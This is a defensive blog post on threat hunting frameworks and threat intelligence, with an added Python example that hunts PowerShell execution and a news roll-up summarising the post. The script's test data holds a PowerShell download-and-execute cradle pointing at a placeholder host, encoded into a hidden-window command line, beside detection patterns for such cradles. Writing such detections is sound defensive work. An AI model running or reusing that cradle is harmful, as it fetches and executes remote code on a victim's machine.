Full Report
Originally published at Arachne Digital.

Threat hunting has become one of the most important activities in modern security operations. In an age where adversaries innovate constantly, waiting for alerts is not enough. A mature SOC must be proactive, searching for adversaries before they trigger alarms and validating whether defences truly work against real-world tactics.

Threat-informed defence is the philosophy that underpins this approach. Instead of hunting based on hunches or generic indicators, teams use structured frameworks that tie hunts to adversary behaviour. This blog explores why threat hunting matters, the major frameworks you can adopt, what makes a hunt successful, and common pitfalls to avoid.

Why Threat Hunting Matters

Attackers Move Faster than Defenders: Threat actors exploit gaps in visibility, misconfigurations, and novel tactics, techniques and procedures (TTPs). By the time an alert fires, damage may already be done. Hunting helps you catch these subtle intrusions earlier.

Detection Gaps Are Inevitable: No matter how advanced your tools, there will be blind spots. Threat hunting exposes those gaps and feeds improvements back into detection engineering.

SOC Maturity and Analyst Skill Growth: Hunting develops analyst expertise, strengthens defensive posture, and moves the SOC from reactive firefighting to proactive security.

The Main Threat Hunting Frameworks

Different organisations have proposed structured methodologies for threat hunting. Here are the most prominent:

MITRE ATT&CK®-Driven Hunting

The MITRE ATT&CK® framework is one of the most widely adopted tools for structuring threat hunts. Rather than starting from scratch, analysts can anchor their hunts in a globally recognised catalogue of adversary tactics and techniques. ATT&CK doesn't just tell you what attackers do; each technique entry also lists the data sources and detection guidance that give you a roadmap for how to detect it. A typical ATT&CK-driven hunting process follows these steps:

1. Select Relevant Tactics and Techniques: Start by choosing ATT&CK techniques based on your threat model, recent intelligence, or adversary profiles. For example, if your organisation is targeted by ransomware actors, you might focus on techniques in the Execution and Impact tactics.

2. Form a Hypothesis: Translate the chosen technique into a hypothesis. For instance: "An adversary may be using PowerShell (T1059.001) for execution in our environment."

3. Map to Available Data Sources: Use the data sources ATT&CK lists for the technique to determine what telemetry you will need. For PowerShell execution this means process creation logs that capture the full command line, the PowerShell operational log (Script Block Logging, event ID 4104, records the decoded content of encoded commands and should be enabled before you hunt), or EDR telemetry. If a required source is missing, that gap is itself a finding to operationalise.

4. Hunt in the Environment: Build queries or detections in your SIEM/EDR to test the hypothesis. Look for activity matching the technique, such as unusual PowerShell command lines: encoded commands, hidden windows, execution-policy bypasses, download-and-execute cradles, or PowerShell spawned by Office applications or other unexpected parent processes.

5. Investigate and Enrich: If suspicious activity is found, enrich it with context: when did it occur, which accounts and hosts were involved, and is it tied to known adversary campaigns?

6. Operationalise Findings: Feed validated findings back into your detection engineering process, for example by creating a new SIEM rule, EDR detection, or SOAR playbook mapped directly to the ATT&CK technique.

7. Measure Coverage: Document which ATT&CK techniques are now covered, identify remaining gaps, and plan the next hunt. Over time, this builds a measurable "ATT&CK coverage map" of your environment. Treat "covered" conservatively: one rule for one procedure does not cover a technique, so record coverage per sub-technique and note which procedures the detection was actually tested against.

SANS Threat Hunting Process (The Hunting Loop)

The SANS Institute's Threat Hunting Loop provides a structured, repeatable process for hunts. It is an intelligence-driven methodology, but with defined stages that make it more than just using threat intel.
The loop consists of:

Hypothesis Generation: Starting with a question based on threat intelligence or observed activity.

Profiling the Environment: Establishing baselines of normal behaviour so that anomalies stand out.

Hunting: Actively testing the hypothesis by querying the available data sources.

Discovery and Enrichment: Investigating findings, correlating them with other data, and gathering context.

Operationalisation: Feeding discoveries back into detections, dashboards, or playbooks to strengthen defences.

This cyclical process ensures hunts not only identify potential threats but also continuously improve detection capabilities.

Hunting Maturity Model (HMM)

The Hunting Maturity Model (HMM) was developed by David Bianco while at Sqrrl (later acquired by Amazon). It defines five levels of hunting maturity, distinguished by how much data an organisation routinely collects and what it does with it:

HM0, Initial: Relies on automated alerting; little routine data collection and no real hunting.

HM1, Minimal: Searches collected data for indicators taken from threat intelligence reports.

HM2, Procedural: Follows hunting procedures created by others over a rich data set, but does not create its own.

HM3, Innovative: Creates new hunting procedures, for example from ATT&CK techniques or observed adversary behaviour.

HM4, Leading: Automates successful procedures so that analyst time goes to new hunts rather than repeating old ones.

This model remains a widely used way for SOCs to benchmark where they are on their hunting journey and chart a path toward maturity.

Analytic Frameworks for Guiding Hunts (Diamond Model and Kill Chain)

Diamond Model for Intrusion Analysis: Focuses on four core features, adversary, capability, infrastructure, and victim, and the relationships between them. Analysts can pivot across these features to generate hypotheses and better understand adversary behaviour.

Cyber Kill Chain® (Lockheed Martin): Breaks an intrusion into seven phases: reconnaissance, weaponisation, delivery, exploitation, installation, command and control, and actions on objectives. It helps hunters frame their work by asking: "At which phase are we most likely to detect this activity in our environment?"

While not catalogues of TTPs in the way MITRE ATT&CK is, both models give analysts useful structures to guide hunts and anticipate adversary behaviour.

TaHiTI Methodology

Some SOC teams adopt lightweight, iterative hunting practices inspired by TaHiTI (Targeted Hunting integrating Threat Intelligence), a methodology published by a working group of Dutch financial institutions. TaHiTI itself is a three-phase process (initiate, hunt, finalise) in which threat intelligence is both the input to a hunt and one of its outputs; the lighter variants keep that intelligence-driven core while emphasising:

- Short cycles of hypothesis and testing
- Rapid feedback into detections
- Flexibility over rigid process

This style suits agile teams who want fast results without the overhead of a full formal framework.

What Makes Threat Hunting Successful

Clear Hypotheses: Hunts should start with a focused, testable question (e.g., "Are adversaries using living-off-the-land binaries to move laterally in our network?").

Threat Intelligence Integration: Quality cyber threat intelligence provides the seed for relevant hunts and ensures defenders are testing against real-world TTPs.

Data Coverage and Visibility: Hunts are only as strong as the telemetry available; endpoint, network, cloud, and identity data must be ingested and searchable.

Repeatability and Documentation: Each hunt should produce lessons learned, new detections, and playbooks for future use.

Feedback Loop to Detection Engineering: Findings from hunts must feed directly into SIEM/SOAR detections, improving resilience over time.

Common Pitfalls to Avoid

Unstructured "Fishing Expeditions": Hunting without hypotheses wastes time and erodes analyst confidence.

Over-Reliance on Tools Alone: Technology supports hunting, but analyst curiosity and critical thinking are irreplaceable.

Failure to Operationalise Results: If hunts don't improve detection coverage or incident response, they're wasted effort.

Not Measuring Value: Without metrics, such as detection coverage improvements, dwell time reduction, or the rate at which hypotheses are validated, executive buy-in may fade.

Burnout and Scope Creep: Analysts tasked with constant ad hoc hunts without a process risk fatigue and inconsistent outcomes.

Bringing It All Together: Threat-Informed Defence

Threat-informed defence is the practice of grounding your security operations in a clear understanding of how adversaries actually operate. Instead of building defences around generic risks or vendor-driven priorities, you align security controls, detection engineering, and response playbooks to real-world adversary TTPs.

In this model, frameworks like MITRE ATT&CK, the Diamond Model, and the SANS Hunting Loop aren't academic exercises; they are the scaffolding that keeps your defence program anchored to reality.

Where threat hunting fits:

- Threat hunting becomes the validation engine for threat-informed defence.
- By testing hypotheses against adversary TTPs, hunts reveal whether your environment can detect and withstand those behaviours.
- Every hunt produces lessons learned: gaps in telemetry, missing detections, or untested assumptions. Those lessons feed back into detection engineering and defensive controls.
- Over time, this cycle ensures your defences are not just theoretical but battle-tested against the threats that matter most to you.

Put simply: threat-informed defence sets the strategy, and threat hunting executes it in practice. The result is a SOC that no longer waits for attackers to announce themselves but continuously checks whether its defences stand up to the adversaries most likely to come knocking.

The Role of Cyber Threat Intelligence in Threat Hunting

Threat hunting is only as strong as the intelligence it's built on. Too often, "threat intelligence" is treated as a feed of indicators of compromise (IOCs): IP addresses, file hashes, or domain names. While IOCs can support detection, they cannot drive threat hunting.
By the time an IOC is distributed, it may already be obsolete, burned, or irrelevant to your environment; an attacker can rotate an IP address or recompile a binary far more cheaply than they can change how they operate. Hunting based on IOCs alone quickly becomes a game of whack-a-mole.

Real threat hunting requires intelligence that answers bigger questions:

Which threat actors are likely to target my industry and geography? Understanding the adversaries most relevant to your organisation ensures you're not chasing ghosts, but focusing on real risks.

Which techniques do those adversaries use? Mapping adversary behaviour to frameworks like MITRE ATT&CK highlights where you should focus your hunts and what data you'll need.

When were those techniques and campaigns active? Bounding intelligence in time matters. Techniques used three years ago may not be relevant today, while emerging campaigns might demand immediate hunts.

Good intelligence informs what to hunt, when to hunt it, and why it matters. This elevates hunting from ad hoc curiosity to a strategic capability.

Arachne Digital provides intelligence that goes beyond static indicators. Our threat intelligence highlights the adversaries most likely to target you, the techniques they employ, and the industries and regions they focus on, all bounded in time. This is the type of intelligence that fuels proactive hunts, closes detection gaps, and enables threat-informed defence.

Reach out to us for more details.

Final Thoughts

Threat hunting is one of the clearest signs of SOC maturity. It demands curiosity, structure, and a willingness to learn from both successes and failures.
Whether you start with ATT&CK, intelligence-driven hunts, or a maturity model, the key is to build a repeatable process that grows with your organisation.

These insights are not abstract theory; they're the foundation of how modern defenders close detection gaps, validate assumptions, and build resilience against today's adversaries.

"Threat Hunting: Building Threat-Informed Defence in Your SOC" was originally published in MeetCyber on Medium.
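The ATT&CK-driven process described above and the three intelligence questions from the CTI section, carried through end to end in one added example. This is editor-written illustration, not code from the original post or from Arachne Digital: constructed, time-bounded intel records select the technique (step 1), a hypothesis for T1059.001 is tested against constructed process-creation events by scoring several weak signals together (step 4), encoded commands are decoded for enrichment (step 5), and the outcome is written into a coverage map (step 7). The actor names, hosts, users, the Sysmon-like event shape, the score weights and the example.invalid URL are all assumptions made for the walkthrough.

```python
"""Worked ATT&CK-driven hunt for PowerShell execution (T1059.001).
Added example, not code from the original post or from Arachne Digital. The intel,
hosts, users and events are constructed; the event shape is an assumed Sysmon-like one."""
import base64
import re
from collections import Counter
from datetime import date

# Step 1: choose techniques from intel bounded by industry, region and recency.
INTEL = [  # constructed adversary profiles, not real CTI
    {"actor": "ACTOR-A", "industries": ["finance"], "regions": ["EU"],
     "techniques": ["T1059.001", "T1486"], "last_seen": "2024-04-30"},
    {"actor": "ACTOR-B", "industries": ["healthcare"], "regions": ["US"],
     "techniques": ["T1566.001"], "last_seen": "2024-05-10"},
    {"actor": "ACTOR-C", "industries": ["finance"], "regions": ["EU", "US"],
     "techniques": ["T1059.001", "T1021.002"], "last_seen": "2021-01-15"},
]

def select_techniques(intel, industry, region, as_of, max_age_days=365):
    """Rank techniques by how many relevant, recently active actors use them."""
    ranked, cutoff = Counter(), date.fromisoformat(as_of)
    for rec in intel:
        age_days = (cutoff - date.fromisoformat(rec["last_seen"])).days
        if industry in rec["industries"] and region in rec["regions"] and age_days <= max_age_days:
            ranked.update(rec["techniques"])
    return [technique for technique, _ in ranked.most_common()]

# Step 2: the hypothesis. Step 3: the data source is process-creation telemetry.
HYPOTHESIS = "An adversary is using PowerShell (T1059.001) for execution on our workstations"

# Step 4: hunt logic. Each signal is weak on its own, so they are scored together.
ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE = re.compile(r"IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient"
                    r"|Invoke-WebRequest|FromBase64String", re.I)
FLAGS = re.compile(r"(?:^|\s)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden"
                   r"|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text) or None."""
    match = ENCODED.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # malformed base64 or odd byte count
        return None

def score_event(event):
    """Score one process-creation event; returns (score, reasons)."""
    if event["image"].lower() not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    score, reasons, cmdline = 0, [], event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 2
        reasons.append("encoded command")
    if CRADLE.search(cmdline) or (decoded and CRADLE.search(decoded)):
        score += 2
        reasons.append("download/execute cradle")
    flags = FLAGS.findall(cmdline)
    if flags:
        score += len(flags)
        reasons.append(f"{len(flags)} evasion flag(s)")
    if event["parent"].lower() in OFFICE_PARENTS:
        score += 2
        reasons.append(f"spawned by {event['parent']}")
    return score, reasons

def hunt(events, threshold=3):
    """Steps 4 and 5: findings at or above threshold, enriched for the analyst."""
    findings = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            findings.append({"host": event["host"], "user": event["user"], "score": score,
                             "reasons": reasons, "decoded": decode_encoded_command(event["cmdline"])})
    return sorted(findings, key=lambda f: f["score"], reverse=True)

def coverage_map(selected, hunted):
    """Step 7: record which selected techniques have now been hunted."""
    return {t: ("hunted" if t in hunted else "gap") for t in selected}

# Constructed telemetry; the encoded payload is built from readable text on purpose.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Temp"},
    {"host": "WS01", "user": "CORP\\alice", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"host": "WS02", "user": "CORP\\bob", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + base64.b64encode(PAYLOAD.encode("utf-16le")).decode()},
    {"host": "SRV01", "user": "CORP\\svc_sccm", "parent": "ccmexec.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NonInteractive -File C:\\ProgramData\\inventory.ps1"},
]

if __name__ == "__main__":
    chosen = select_techniques(INTEL, "finance", "EU", "2024-05-22")
    print("hunt order:", chosen, "| hypothesis:", HYPOTHESIS)
    for finding in hunt(EVENTS):
        print(finding)
    print("coverage:", coverage_map(chosen, {"T1059.001"}))
```

Run as a script, the intel step ranks T1059.001 ahead of T1486 for a finance organisation in the EU and drops ACTOR-C as stale; the hunt returns one finding, the Office-spawned, hidden, encoded download cradle on WS02, with the decoded payload attached for the analyst; and the coverage map records T1486 as a remaining gap. The lone ExecutionPolicy Bypass on WS01 scores 1 and stays below the threshold on purpose, because that flag alone is common in legitimate administration. In a real SIEM the same logic becomes a query over process-creation telemetry rather than an in-memory list, and the weights should be tuned against your own baseline before the rule is promoted to a detection.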
Analysis Summary
# Morning News Roll-up 2024-05-22
## Overview
Today's report covers the strategic implementation of threat hunting to build threat-informed defenses, alongside a technical analysis of Clop ransomware network infrastructure.
## Top Stories
### Threat Hunting: Building Threat-Informed Defence in Your SOC
- Summary: This report outlines the shift from reactive to proactive security operations. It highlights major frameworks like MITRE ATT&CK and the SANS Hunting Loop to move SOCs beyond basic alert monitoring and toward structured adversary behavior validation.
- Source: hxxps://www[.]arachne[.]digital/blogs/threat-hunting-building-threat-informed-defence-in-your-soc
### The Art of Threat Hunting: Core Methodologies
- Summary: A deep dive into the Hunting Maturity Model (HMM) and behavioral analytics. It emphasizes that successful hunting requires moving away from static Indicators of Compromise (IoCs) toward identifying Tactics, Techniques, and Procedures (TTPs).
- Source: hxxps://medium[.]com/@jaynagrecha/the-art-of-threat-hunting-ba6e385d6cdc
### CL0P Ransomware: Dissecting Network Infrastructure
- Summary: Technical research investigating the specific network protocols and infiltration methods used by the Clop ransomware group, focusing on their lateral movement and command-and-control (C2) setups.
- Source: hxxps://rakeshkrish[.]medium[.]com/cl0p-ransomware-dissecting-network-75d4761deedc
---
# Main Topic
**Proactive Threat Hunting and Threat-Informed Defence Strategy**
A strategic approach to modernizing Security Operations Centers (SOC) by transitioning from reactive alert-based monitoring to proactive, hypothesis-driven hunting based on real-world adversary behaviors.
## Key Points
- **Shift to Proactive Stance:** Modern attackers innovate faster than traditional defenses; hunting catches intrusions before alerts fire.
- **Validation Engine:** Threat hunting serves as the practical validation for "Threat-Informed Defence," testing if security controls actually stand up to known TTPs.
- **Operationalization:** Successful hunts must feed findings (telemetry gaps, new detections) back into Detection Engineering via SIEM/SOAR.
- **Beyond Indicators:** Effective hunting focuses on behaviors (TTPs) rather than static IoCs like IP addresses or file hashes, which are easily "burned" by attackers.
## Threat Actors
- **Ransomware Groups:** Specifically highlighted as a primary driver for hunting Execution and Impact tactics.
- **Clop Ransomware:** Mentioned in associated research regarding network infiltration techniques.
- **Industry-Specific Adversaries:** The report emphasizes identifying actors relevant to an organization's specific geography and vertical.
## TTPs
- **MITRE ATT&CK Framework:** Used to anchor hunts in recognized adversary tactics.
- **Command and Scripting Interpreter: PowerShell (T1059.001):** An Execution-tactic sub-technique; the example hypothesis is PowerShell being used for execution, with process creation and PowerShell operational logs as the data sources.
- **Living-off-the-Land (LotL):** Use of legitimate binaries for lateral movement.
- **Hypothesis-Based Hunting:** Formulating testable questions (e.g., "Is PowerShell being used for initial execution?").
- **Environmental Profiling:** Establishing baselines to identify anomalies in normal behavior.
## Affected Systems
- **Endpoint Systems:** Specifically Windows environments utilizing PowerShell.
- **Identity Systems:** Called out as telemetry that must be ingested and searchable, and used during enrichment to establish which accounts were involved in a finding.
- **Network Infrastructure:** Targeted by groups like Clop for lateral movement.
- **Cloud Environments:** Noted as a necessary telemetry source for comprehensive visibility.
## Mitigations
- **Detection Engineering Feedback Loop:** Creating SIEM rules and EDR detections based on validated hunt findings.
- **Telemetry Enhancement:** Closing visibility gaps in PowerShell operational logs and process creation logs.
- **SOC Maturity Modeling:** Using the Hunting Maturity Model (HMM) to benchmark the SOC and plan the move toward procedural, innovative, and automated hunting.
- **Intelligence Integration:** Utilizing CTI to prioritize hunts based on currently active campaigns rather than historical data.
## Conclusion
Threat hunting is a critical indicator of SOC maturity. To be effective, it must move away from "fishing expeditions" and toward a structured, repeatable loop. Organizations should adopt the MITRE ATT&CK framework and the SANS Hunting Loop to ensure that every hunt improves the overall defensive posture and reduces adversary dwell time.